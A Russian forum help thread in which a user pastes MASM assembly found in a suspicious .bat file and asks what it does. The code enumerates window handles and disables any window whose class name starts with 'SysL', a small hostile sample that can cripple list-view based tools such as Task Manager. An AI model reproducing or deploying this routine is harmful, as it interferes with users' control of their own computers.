Перейти к содержанию
Важная информация для бета-тестеров

В компьютер попал файл написанный на Ассемблере

Andrey_D

От Andrey_D
в Компьютерная помощь

 Share

Рекомендуемые сообщения

Andrey_D Постоялец

Andrey_D

Опубликовано
Опубликовано

Здравствуйте.

 

Я в компьютере обнаружил неизвестные файлы с расширением .exe и .bat

 

После решил проверить эти файлы антивирусом Касперского KIS2009 но антивирус не обнаружил ничего подозрительного.

 

я решил посмотрел структуру файла один из которых был закодирован(зашифрован),

 

а во втором файле с расширением bat я увидел код написанный на Ассемблере.

 

includelib \masm32\lib\kernel32.lib

extrn __imp__ExitProcess@4:dword

ExitProcess equ __imp__ExitProcess@4

 

includelib \masm32\lib\user32.lib

extrn __imp__EnableWindow@8:dword

extrn __imp__GetClassNameA@12:dword

EnableWindow equ __imp__EnableWindow@8

GetClassName equ __imp__GetClassNameA@12

 

.386

.model flat

.data

buffer db 4 dup (?)

.code

_start:

xor esi, esi

mov ebx, 100000

lea edi, buffer

 

repeat_this:

inc esi

 

push 5

push edi

push esi

call GetClassName

 

test eax, eax

jz @1

 

cmp dword ptr [edi], 'LsyS'

jne @1

 

push 0

push esi

call EnableWindow

@1:

dec ebx

jnz repeat_this

 

push ebx

call ExitProcess

end _start

 

 

Кто подскажет что этот код может сделать с моим компьютером ?

Ссылка на комментарий
Поделиться на другие сайты
Andrey_D Постоялец

Andrey_D

Опубликовано
  • Автор
Опубликовано

В службу поддержки я и сам могу отправить информацию по этому поводу это не трудно.

 

Я то думал что тут найдутся программисты которые пишут программы на языке Ассемблер.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • keinsdow
      Попался на Фейк-каптчу
      От keinsdow
      Хотел конвертировать PNG
      Перешёл на сайт hotpng.com
      Попал на фейк каптчу и инструкцию:
      удалено
      После этого выполнил восстановление через восстановления Windows
      Теперь не могу точно сказать, осталсяCollectionLog-2025.02.01-19.34.zip какой либо вирус или какие либо данные были украдены
    • iaroslav
      Майнер на компьютере
      От iaroslav
      Я подозреваю что у меня майнер или троян так как у меня не открываются параметры( все способы перепробовал) а также при открытии например панели управления выскакивает табличка: операция отменена из за огранечений..... Обратитесь к администратору хотя я и есть администратор. Перед этим я использовал AVbr и только потом AutoLogger
      AV_block_remove_2025.02.02-17.03.log report2.log report1.log CollectionLog-2025.02.02-17.19.zip
    • Ivan Serov
      Зависание и перезагрузка компьютера
      От Ivan Serov
      Приветствую. Спокойно сидел в пк, как вдруг завис экран на одной картинке, звук непрерывный и потом компьютер перезагрузился. Стоит запись "Дамп памяти ядра". При необходимости могу скинуть.
      Компьютер был перезагружен после критической ошибки. Код ошибки: 0x0000007e (0xffffffffc0000005, 0xfffff80454f90e36, 0xffff968309bf5d28, 0xffff968309bf5560). Дамп памяти сохранен в: C:\WINDOWS\MEMORY.DMP. Код отчета: e629bc3c-8a0e-450c-a73a-9176ef5d590d.
      Прикладываю малый дамп, сведения о системе и DxDiag.
      Desktop.zip
    • egor536457253453
      Нашел майнер на компьютере
      От egor536457253453
      Недавно пытался обойди блокировку дискорда, но получил майнер, пытался его удалить через Kaspersky Virus Removal Tool и Dr.Web CureIt, но ничего не помогло, помогите пожалуйста. ЛОГИ:

      CollectionLog-2025.02.04-10.10.zip
    • Golem555
      Майнер жрёт оперативку и компьютер тормозит
      От Golem555
      CollectionLog-2025.02.21-22.40.zip
×
×
  • Создать...